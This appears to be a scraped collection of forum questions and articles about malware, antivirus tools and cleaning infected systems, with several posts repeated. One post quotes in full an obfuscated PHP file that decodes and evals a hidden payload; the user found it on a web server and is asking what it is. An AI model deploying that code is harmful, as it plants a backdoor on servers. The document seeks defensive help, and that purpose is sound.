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  • How can I automate or script daily downloads for any new anti- virus databases, and then have the program scan my drive?

    - by Macgrimm
    Howdy all Super Users" I humbly ask if any Super User can direct this long time, gray haired Apple Tech in the right direction on this issue. I believe there probably are many ways to skin this cat. But I am looking to find simply the best, most unattended way to get it done. Any help will be greatly appreciated. also (I know there are much better softwares out there for the Mac so please don't go there! The politics of this company dictate which Anti virus we have to use) anyway without any further wait: basically I am trying to automate 2 very important functions of Mc'Afee anti-virus for Mac. First I want to automate the process of retrieving new virus definition files, and second I want to automate the process of scanning for viruses. It turns out that Using Mc'Afee Anti-Virus for the Mac are both manual functions. And they left up to the user (per user account) to perform. Depending on all of about 150 MAc users to perform these 2 tasks themselves is around 65% compliance. My question then is: If I wanted to use the command line such as (open /Applications/McAfee\ Security.app) It will open up the Security Console. But how can I make command Mc'Afee go out and grab the definition files and scan the computer? I have to admit I am at a crossroad and Macaltimers has set in. I would really appreciate it if any of you "Super ~ Users" can help me out with this MacAltimers loss of how to what to do. Thanks to All up Front Macgrimm

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  • Not All “Viruses” Are Viruses: 10 Malware Terms Explained

    - by Chris Hoffman
    Most people seem to call every type of malware a “virus”, but that isn’t technically accurate. You’ve probably heard of many more terms beyond virus: malware, worm, Trojan, rootkit, keylogger, spyware, and more. But what do all these terms mean? These terms aren’t just used by geeks. They make their way into even mainstream news stories about the latest web security problems and tech scares. Understanding them will help you understand the dangers your\ hear about. Malware The word “malware” is short for “malicious software.” Many people use the word “virus” to indicate any type of harmful software, but a virus is actually just a specific type of malware. The word “malware” encompasses all harmful software, including all the ones listed below. Virus Let’s start with viruses. A virus is a type of malware that copies itself by infecting other files,  just as viruses in the real world infect biological cells and use those biological cells to reproduce copies of themselves. A virus can do many different things — watch in the background and steal your passwords, display advertisements, or just crash your computer — but the key thing that makes it a virus is how it spreads. When you run a virus, it will infect programs on your computer. When you run the program on another computer, the virus will infect programs on that computer, and so on. For example, a virus might infect program files on a USB stick. When the programs on that USB stick are run on another computer, the virus runs on the other computer and infects more program files. The virus will continue to spread in this way. Worm A worm is similar to a virus, but it spreads a different way. Rather than infecting files and relying on human activity to move those files around and run them on different systems, a worm spreads over computer networks on its own accord. For example, the Blaster and Sasser worms spread very quickly in the days of Windows XP because Windows XP did not come properly secured and exposed system services to the Internet. The worm accessed these system services over the Internet, exploited a vulnerability, and infected the computer. The worm then used the new infected computer to continue replicating itself. Such worms are less common now that Windows is properly firewalled by default, but worms can also spread in other ways — for example, by mass-emailing themselves to every email address in an effected user’s address book. Like a virus, a worm can do any number of other harmful things once it infects a computer. The key thing that makes it a worm is simply how it spreads copies of itself. Trojan (or Trojan Horse) A Trojan horse, or Trojan, is a type of malware that disguises itself as a legitimate file. When you download and run the program, the Trojan horse will run in the background, allowing third-parties to access your computer. Trojans can do this for any number of reasons — to monitor activity on your computer, to join your computer to a botnet. Trojans may also be used to open the floodgates and download many other types of malware onto your computer. The key thing that makes this type of malware a Trojan is how it arrives. It pretends to be a useful program and, when run, it hides in the background and gives malicious people access to your computer. It isn’t obsessed with copying itself into other files or spreading over the network, as viruses and worms are. For example, a piece of pirated software on an unscrupulous website may actually contain a Trojan. Spyware Spyware is a type of malicious software that spies on you without your knowledge. It collects a variety of different types of data, depending on the piece of spyware. Different types of malware can function as spyware — there may be malicious spyware included in Trojans that spies on your keystrokes to steal financial data, for example. More “legitimate” spyware may be bundled along with free software and simply monitor your web browsing habits, uploading this data to advertising servers so the software’s creator can make money from selling their knowledge of your activities. Adware Adware often comes along with spyware. It’s any type of software that displays advertising on your computer. Programs that display advertisements inside the program itself aren’t generally classified as malware. The kind of “adware” that’s particularly malicious is the kind that abuses its access to your system to display ads when it shouldn’t. For example, a piece of harmful adware may cause pop-up advertisements to appear on your computer when you’re not doing anything else. Or, adware may inject additional advertising into other web pages as you browse the web. Adware is often combined with spyware — a piece of malware may monitor your browsing habits and use them to serve you more targeted ads. Adware is more “socially acceptable” than other types of malware on Windows and you may see adware bundled with legitimate programs. For example, some people consider the Ask Toolbar included with Oracle’s Java software adware. Keylogger A keylogger is a type of malware that runs in the background, recording every key stroke you make. These keystrokes can include usernames, passwords, credit card numbers, and other sensitive data. The keylogger then, most likely, uploads these keystrokes to a malicious server, where it can be analyzed and people can pick out the useful passwords and credit card numbers. Other types of malware can act as keyloggers. A virus, worm, or Trojan may function as a keylogger, for example. Keyloggers may also be installed for monitoring purposes by businesses or even jealous spouses. Botnet, Bot A botnet is a large network of computers that are under the botnet creator’s control. Each computer functions as a “bot” because it’s infected with a specific piece of malware. Once the bot software infects the computer, ir will connect to some sort of control server and wait for instructions from the botnet’s creator. For example, a botnet may be used to initiate a DDoS (distributed denial of service) attack. Every computer in the botnet will be told to bombard a specific website or server with requests at once, and such millions or requests can cause a server to become unresponsive or crash. Botnet creators may sell access to their botnets, allowing other malicious individuals to use large botnets to do their dirty work. Rootkit A rootkit is a type of malware designed to burrow deep into your computer, avoiding detection by security programs and users. For example, a rootkit might load before most of Windows, burying itself deep into the system and modifying system functions so that security programs can’t detect it. A rootkit might hide itself completely, preventing itself from showing up in the Windows task manager. The key thing that makes a type of malware a rootkit is that it’s stealthy and focused on hiding itself once it arrives. Ransomware Ransomware is a fairly new type of malware. It holds your computer or files hostage and demands a ransom payment. Some ransomware may simply pop up a box asking for money before you can continue using your computer. Such prompts are easily defeated with antivirus software. More harmful malware like CryptoLocker literally encrypts your files and demands a payment before you can access them. Such types of malware are dangerous, especially if you don’t have backups. Most malware these days is produced for profit, and ransomware is a good example of that. Ransomware doesn’t want to crash your computer and delete your files just to cause you trouble. It wants to take something hostage and get a quick payment from you. So why is it called “antivirus software,” anyway? Well, most people continue to consider the word “virus” synonymous with malware as a whole. Antivirus software doesn’t just protect against viruses, but against all types of malware. It may be more accurately referred to as “antimalware” or “security” software. Image Credit: Marcelo Alves on Flickr, Tama Leaver on Flickr, Szilard Mihaly on Flickr     

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  • My website is infected with JS:ScriptIP-inf [Trj]

    - by Rizwan Aaqil
    I am using Network Solutions hosting. I was recently attacked with JS:Illredir-S [Trj], I asked my hosting providers to clean it and they cleaned it and updated all passwords, but now after a week my site got infected again with JS:ScriptIP-inf [Trj]. Can anyone please suggest me how to secure my website properly ? Should I change my hosting provider ? I am fed up of these viruses again and again on my websites. I can't even find this virus in my files. Please post informative answers. Thanks

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  • Scan a Windows PC for Viruses from a Ubuntu Live CD

    - by Trevor Bekolay
    Getting a virus is bad. Getting a virus that causes your computer to crash when you reboot is even worse. We’ll show you how to clean viruses from your computer even if you can’t boot into Windows by using a virus scanner in a Ubuntu Live CD. There are a number of virus scanners available for Ubuntu, but we’ve found that avast! is the best choice, with great detection rates and usability. Unfortunately, avast! does not have a proper 64-bit version, and forcing the install does not work properly. If you want to use avast! to scan for viruses, then ensure that you have a 32-bit Ubuntu Live CD. If you currently have a 64-bit Ubuntu Live CD on a bootable flash drive, it does not take long to wipe your flash drive and go through our guide again and select normal (32-bit) Ubuntu 9.10 instead of the x64 edition. For the purposes of fixing your Windows installation, the 64-bit Live CD will not provide any benefits. Once Ubuntu 9.10 boots up, open up Firefox by clicking on its icon in the top panel. Navigate to http://www.avast.com/linux-home-edition. Click on the Download tab, and then click on the link to download the DEB package. Save it to the default location. While avast! is downloading, click on the link to the registration form on the download page. Fill in the registration form if you do not already have a trial license for avast!. By the time you’ve filled out the registration form, avast! will hopefully be finished downloading. Open a terminal window by clicking on Applications in the top-left corner of the screen, then expanding the Accessories menu and clicking on Terminal. In the terminal window, type in the following commands, pressing enter after each line. cd Downloadssudo dpkg –i avast* This will install avast! on the live Ubuntu environment. To ensure that you can use the latest virus database, while still in the terminal window, type in the following command: sudo sysctl –w kernel.shmmax=128000000 Now we’re ready to open avast!. Click on Applications on the top-left corner of the screen, expand the Accessories folder, and click on the new avast! Antivirus item. You will first be greeted with a window that asks for your license key. Hopefully you’ve received it in your email by now; open the email that avast! sends you, copy the license key, and paste it in the Registration window. avast! Antivirus will open. You’ll notice that the virus database is outdated. Click on the Update database button and avast! will start downloading the latest virus database. To scan your Windows hard drive, you will need to “mount” it. While the virus database is downloading, click on Places on the top-left of your screen, and click on your Windows hard drive, if you can tell which one it is by its size. If you can’t tell which is the correct hard drive, then click on Computer and check out each hard drive until you find the right one. When you find it, make a note of the drive’s label, which appears in the menu bar of the file browser. Also note that your hard drive will now appear on your desktop. By now, your virus database should be updated. At the time this article was written, the most recent version was 100404-0. In the main avast! window, click on the radio button next to Selected folders and then click on the “+” button to the right of the list box. It will open up a dialog box to browse to a location. To find your Windows hard drive, click on the “>” next to the computer icon. In the expanded list, find the folder labelled “media” and click on the “>” next to it to expand it. In this list, you should be able to find the label that corresponds to your Windows hard drive. If you want to scan a certain folder, then you can go further into this hierarchy and select that folder. However, we will scan the entire hard drive, so we’ll just press OK. Click on Start scan and avast! will start scanning your hard drive. If a virus is found, you’ll be prompted to select an action. If you know that the file is a virus, then you can Delete it, but there is the possibility of false positives, so you can also choose Move to chest to quarantine it. When avast! is done scanning, it will summarize what it found on your hard drive. You can take different actions on those files at this time by right-clicking on them and selecting the appropriate action. When you’re done, click Close. Your Windows PC is now free of viruses, in the eyes of avast!. Reboot your computer and with any luck it will now boot up! Alternatives to avast! If avast! and a liberal amount of Googling doesn’t fix your problem, it’s possible that a different virus scanner will fix your obscure issue. Here are a list of other virus scanners available for Ubuntu that are either free or offer free trials. See their support forums for help on installing these virus scanners. Avira AntiVir Personal for Linux / Solaris Panda Antivirus for Linux Installation and usage guide from Ubuntu F-PROT Antivirus for Linux ClamAV installation and usage guide from Ubuntu NOD32 Antivirus for Linux Kaspersky Anti-Virus 2010 Bitdefender Antivirus for Unices Conclusion Running avast! from a Ubuntu Live CD can clean the vast majority of viruses from your Windows PC. This is another reason to always have a Ubuntu Live CD ready just in case something happens to your Windows installation! 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  • How can I get a virus by just visiting a website?

    - by Janet Jacobs
    It is common knowledge that you can get a virus just by visiting a website. But how is this possible? Do these viruses attack Windows, Mac and Linux users, or are Mac/Linux users immune? I understand that I obviously can get a virus by downloading and executing a .exe in Windows but how can I get a virus just by accessing a website? Are the viruses programmed in JavaScript? (It would make sense since it is a programming language that runs locally.) If so, what JavaScript functions are the ones commonly used?

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  • Weird PHP file on my website

    - by sam
    Today i noticed that there was a strange new file called "noivil.php" on my webspace. The contents of it are very long and I have no idea what it does! <?php $k='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';$r='YmFzZTY0X2RlY29kZQ==';$rr='WjNwMWJtTnZiWEJ5WlhOeg==';$rrr=base64_decode($r);$rrrr=$rrr($rrr($rr));eval($rrrr($rrr($k))); When I run it it just outputs some random stuff I don't understand. My questions: What is this? Where did it come from? Is it a virus/trojan? What does it exactly do? You are better at PHP than me, maybe you can tell what it is Thanks in advance

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  • Using PHP's IMAP library triggers Kaspersky's Antivirus

    - by TMG
    Hello, I just started today working with PHP's IMAP library, and while imap_fetchbody or imap_body are called, it is triggering my Kaspersky antivirus. The viruses are Trojan.Win32.Agent.dmyq and Trojan.Win32.FraudPack.aoda. I am running this off a local development machine with XAMPP and Kaspersky AV. Now, I am sure there are viruses there since there is spam in the box (who doesn't need a some viagra or vicodin these days?). And I know that since the raw body includes attachments and different mime-types, bad stuff can be in the body. So my question is: are there any risks using these libraries? I am assuming that the IMAP functions are retrieving the body, caching it to disk/memory and the AV scanning it sees the data. Is that correct? Are there any known security concerns using this library (I couldn't find any)? Does it clean up cached message parts perfectly or might viral files be sitting somewhere? Is there a better way to get plain text out of the body than this? Right now I am using the following code (credit to Kevin Steffer): function get_mime_type(&$structure) { $primary_mime_type = array("TEXT", "MULTIPART","MESSAGE", "APPLICATION", "AUDIO","IMAGE", "VIDEO", "OTHER"); if($structure->subtype) { return $primary_mime_type[(int) $structure->type] . '/' .$structure->subtype; } return "TEXT/PLAIN"; } function get_part($stream, $msg_number, $mime_type, $structure = false, $part_number = false) { if(!$structure) { $structure = imap_fetchstructure($stream, $msg_number); } if($structure) { if($mime_type == get_mime_type($structure)) { if(!$part_number) { $part_number = "1"; } $text = imap_fetchbody($stream, $msg_number, $part_number); if($structure->encoding == 3) { return imap_base64($text); } else if($structure->encoding == 4) { return imap_qprint($text); } else { return $text; } } if($structure->type == 1) /* multipart */ { while(list($index, $sub_structure) = each($structure->parts)) { if($part_number) { $prefix = $part_number . '.'; } $data = get_part($stream, $msg_number, $mime_type, $sub_structure,$prefix . ($index + 1)); if($data) { return $data; } } // END OF WHILE } // END OF MULTIPART } // END OF STRUTURE return false; } // END OF FUNCTION $connection = imap_open($server, $login, $password); $count = imap_num_msg($connection); for($i = 1; $i <= $count; $i++) { $header = imap_headerinfo($connection, $i); $from = $header->fromaddress; $to = $header->toaddress; $subject = $header->subject; $date = $header->date; $body = get_part($connection, $i, "TEXT/PLAIN"); }

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  • writing boot sector code

    - by JGC
    hi I want to write a code which put something in bootsector but when I run the assembly 8086 code which does this purpose, nothing happens. does any one know what can I do or does any one has code (in any language) which answer my need?

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  • Malware on a client's website - Ideas?

    - by Jeriko
    We recently got a call from one of our clients, complaining that their site has some "strange looking code" at the bottom of the page. We checked out the source code, and discovered that about 800 bytes of malicious javascript code had been appended to the templates/master file, after the </html> tag. I won't post said code because it looked particularly nasty. As far as I can tell, there would be no way for this file to be edited in any way, unless someone had direct access to the server and/or FTP login details. The actual file itself has been modified, so that rules out any kind of SQL attack. Besides a person physically gaining credentials and hand-modifying this file, would there be any other logical explaination for what happened? Has anyone else had experience with something like this happening?

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  • Live CD with good anti-virus software to scan/repair Windows?

    - by overtherainbow
    Hello, I browsed through the archives, and it seems like there's no live CD from which to run a good, up-to-date anti-virus application, at least to check whether a Windows host has been compromised The Ultimate Boot CD has only three AV applications, and their virus definition is from... 2007 In a report, ClamAV scored very low. It's nice that it's open-source, but if it's not as good as commercial alternatives... Those of you into this kind of thing, do you confirm that there's just no good live CD to inspect Windows hosts, and possibly repair them? If there is, what do you recommend? Thank you.

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  • Looking for Fiddler2 help. connection to gateway refused? Just got rid of a virus

    - by John Mackey
    I use Fiddler2 for facebook game items, and it's been a great success. I accessed a website to download some dat files I needed. I think it was eshare, ziddu or megaupload, one of those. Anyway, even before the rar file had downloaded, I got this weird green shield in the bottom right hand corner of my computer. It said a Trojan was trying to access my computer, or something to that extent. It prompted me to click the shield to begin anti-virus scanning. It turns out this rogue program is called Antivirus System Pro and is pretty hard to get rid of. After discovering the rogue program, I tried using Fiddler and got the following error: [Fiddler] Connection to Gateway failed.Exception Text: No connection could be made because the target machine actively refused it 127.0.0.1:5555 I ended up purchasing SpyDoctor + Antivirus, which I'm told is designed specifically for getting rid of these types of programs. Anyway, I did a quick-scan last night with spydoctor and malware bytes. Malware picked up 2 files, and Spydoctor found 4. Most were insignificant, but it did find a worm called Worm.Alcra.F, which was labeled high-priority. I don’t know if that’s the Anti-Virus Pro or not, but SpyDoctor said it got rid of all of those successfully. I tried to run Fiddler again before leaving home, but was still getting the "gateway failed" error. Im using the newest version of firefox. When I initially set up the Fiddler 2.2.8.6, I couldn’t get it to run at first, so I found this faq on the internet that said I needed to go through ToolsOptionsSettings and set up an HTTP Proxy to 127.0.0.1 and my Port to 8888. Once I set that up and downloaded this fiddler helper as a firefox add-on, it worked fine. When I turn on fiddler, it automatically takes my proxy setting from no proxy (default) to the 127.0.0.1 with Port 8888 set up. It worked fine until my computer detected this virus. Anyway, hopefully I've given you sufficient information to offer me your best advice here. Like I said, Spydoctor says the bad stuff is gone, so maybe the rogue program made some type of change in my fiddler that I could just reset or uncheck or something like that? Or will I need to completely remove fiddler and those dat files and rar files I downloaded? Any help would be greatly appreciated. Thanks for your time.

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  • Looking for Fiddler2 help. connection to gateway refused...just got rid of a virus?

    - by john mackey
    I use Fiddler2 for facebook game items, and it's been a great success. I accessed a website to download some dat files I needed. I think it was eshare, ziddu or megaupload, one of those. Anyway, even before the rar file had downloaded, I got this weird green shield in the bottom right hand corner of my computer. It said a Trojan was trying to access my computer, or something to that extent. It prompted me to click the shield to begin anti-virus scanning. It turns out this rogue program is called Antivirus System Pro and is pretty hard to get rid of. After discovering the rogue program, I tried using Fiddler and got the following error: [Fiddler] Connection to Gateway failed. Exception Text: No connection could be made because the target machine actively refused it 127.0.0.1:5555 I ended up purchasing SpyDoctor + Antivirus, which I'm told is designed specifically for getting rid of these types of programs. Anyway, I did a quick-scan last night with spydoctor and malware bytes. Malware picked up 2 files, and Spydoctor found 4. Most were insignificant, but it did find a worm called Worm.Alcra.F, which was labeled high-priority. I don’t know if that’s the Anti-Virus Pro or not, but SpyDoctor said it got rid of all of those successfully. I tried to run Fiddler again before leaving home, but was still getting the "gateway failed" error. Im using the newest version of firefox. When I initially set up the Fiddler 2.2.8.6, I couldn’t get it to run at first, so I found this faq on the internet that said I needed to go through ToolsOptionsSettings and set up an HTTP Proxy to 127.0.0.1 and my Port to 8888. Once I set that up and downloaded this fiddler helper as a firefox add-on, it worked fine. When I turn on fiddler, it automatically takes my proxy setting from no proxy (default) to the 127.0.0.1 with Port 8888 set up. It worked fine until my computer detected this virus. Anyway, hopefully I've given you sufficient information to offer me your best advice here. Like I said, Spydoctor says the bad stuff is gone, so maybe the rogue program made some type of change in my fiddler that I could just reset or uncheck or something like that? Or will I need to completely remove fiddler and those dat files and rar files I downloaded? Any help would be greatly appreciated. Thanks for your time.

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  • Découverte d'un botnet "pratiquement indestructible", TDL-4 contrôle 4.5 millions d'ordinateurs et agit en tant qu'anti-virus

    Sécurité : découverte d'un nouveau botnet "pratiquement indestructible" TDL-4 contrôle 4.5 millions d'ordinateurs dans le monde Plus de 4.5 millions d'ordinateurs forment un nouveau botnet découvert par Kaspersky Labs qui le qualifie de « pratiquement indestructible ». D'après un rapport publié par l'éditeur russe de solutions de sécurité, le botnet « TDL-4 » ainsi découvert revêt une architecture particulièrement sophistiquée qui le hisse au rang de la plus dangereuse menace de l'histoire de la sécurité informatique. « TDSS utilise un ensemble de méthodes pour échapper aux signatures [numériques], aux [méthodes de détections] heuristiques...

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  • What anti-virus & firewall (with IDS) should I use for a windows server machine?

    - by Eran Betzalel
    I want one product to cover for Anti-virus & Firewall purposes. The product should also be lightweight and of course designed for windows server. Any suggestions? Note: I don't need an enterprise solution for the clients - only for the server. BTW, I currently using Symantec SEP, but it's too heavy (during weekly scans) for the server to handle and is not designed for server purposes.

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  • scary islamic messages on mouse in libreoffice - a virus?

    - by yuvi
    This is weird. Today I opened an excel file with libre office. Suddenly I saw the mouse changed color, and stuck to it was a message in Arabic, which changed every second in a loop. I can actually read Arabic so I immediatly recognized it as Islamic messages praising Allah (including the Takbir). Here's a screenshot: At first I thought this was something with the file, but then I saw that this happens with any libre office program (but only libre-office programs), and even when they're open, it only changes the mouse when it's hovering over the libre program, and goes back to normal anywhere else. Also, re-installing did not help. I tried running software updater - but I got an error where it couldn't load some steam repositories, but that seems like a coincidence: Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en_US Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en Here's another hint - I tried taking several screenshots of several messages, but they all ended up showing the same message (the one above). Hopefully that means anything. I should note I haven't installed anything fishy lately, and I hardly ever use libre office at all (I prefer Google Drive whenever I need to work with documents), so I'm really unsure as to how this happened. Anyway, this is scary. Any help would be greatly appreciated!

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  • What is the Your Favorite Managed Anti-Virus for a Small Workgroup (under 25 Machines)? [closed]

    - by arrocharJames
    I am a solo IT employee for a small company that has a couple of servers and 10 workstations (Windows and Mac, Macs do not run AV software). I want to centrally manage Anti-Virus for all the computers with some sort of control panel. I have been using Symantec Corporate versions for years, but the latest version (Symantec Endpoint Protection 11.x) is totally over-complicated, and aimed at enterprises with 1000s of computers. Can anyone recommend something reliable, centrally managed, and simple?

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  • Looking for Fiddler2 help. connection to gateway refused? Just got rid of a virus

    - by John Mackey
    I use Fiddler2 for facebook game items, and it's been a great success. I accessed a website to download some dat files I needed. I think it was eshare, ziddu or megaupload, one of those. Anyway, even before the rar file had downloaded, I got this weird green shield in the bottom right hand corner of my computer. It said a Trojan was trying to access my computer, or something to that extent. It prompted me to click the shield to begin anti-virus scanning. It turns out this rogue program is called Antivirus System Pro and is pretty hard to get rid of. After discovering the rogue program, I tried using Fiddler and got the following error: [Fiddler] Connection to Gateway failed.Exception Text: No connection could be made because the target machine actively refused it 127.0.0.1:5555 I ended up purchasing SpyDoctor + Antivirus, which I'm told is designed specifically for getting rid of these types of programs. Anyway, I did a quick-scan last night with spydoctor and malware bytes. Malware picked up 2 files, and Spydoctor found 4. Most were insignificant, but it did find a worm called Worm.Alcra.F, which was labeled high-priority. I don’t know if that’s the Anti-Virus Pro or not, but SpyDoctor said it got rid of all of those successfully. I tried to run Fiddler again before leaving home, but was still getting the "gateway failed" error. Im using the newest version of firefox. When I initially set up the Fiddler 2.2.8.6, I couldn’t get it to run at first, so I found this faq on the internet that said I needed to go through ToolsOptionsSettings and set up an HTTP Proxy to 127.0.0.1 and my Port to 8888. Once I set that up and downloaded this fiddler helper as a firefox add-on, it worked fine. When I turn on fiddler, it automatically takes my proxy setting from no proxy (default) to the 127.0.0.1 with Port 8888 set up. It worked fine until my computer detected this virus. Anyway, hopefully I've given you sufficient information to offer me your best advice here. Like I said, Spydoctor says the bad stuff is gone, so maybe the rogue program made some type of change in my fiddler that I could just reset or uncheck or something like that? Or will I need to completely remove fiddler and those dat files and rar files I downloaded? Any help would be greatly appreciated. Thanks for your time.

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  • What's a good anti-virus besides Kaspersky and Nod32?

    - by KeyStroke
    Hi there, I've been using Nod32 for a few years until it started conflicting with the new version of my backup software, which is essential for me. So then I tried Kaspersky, and it's good but it forces all internet traffic to go through it (as I can see through NetLimiter), which keeps breaking my downloads and giving me timeouts. So my question is: is there a good anti-virus i could use beside these two? I need it to be light and efficient. I'm not looking for free ones btw. Appreciate your input.

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  • After virus, Chrome & Internet Explorer won't connect to the internet, but Firefox works fine.

    - by Zack
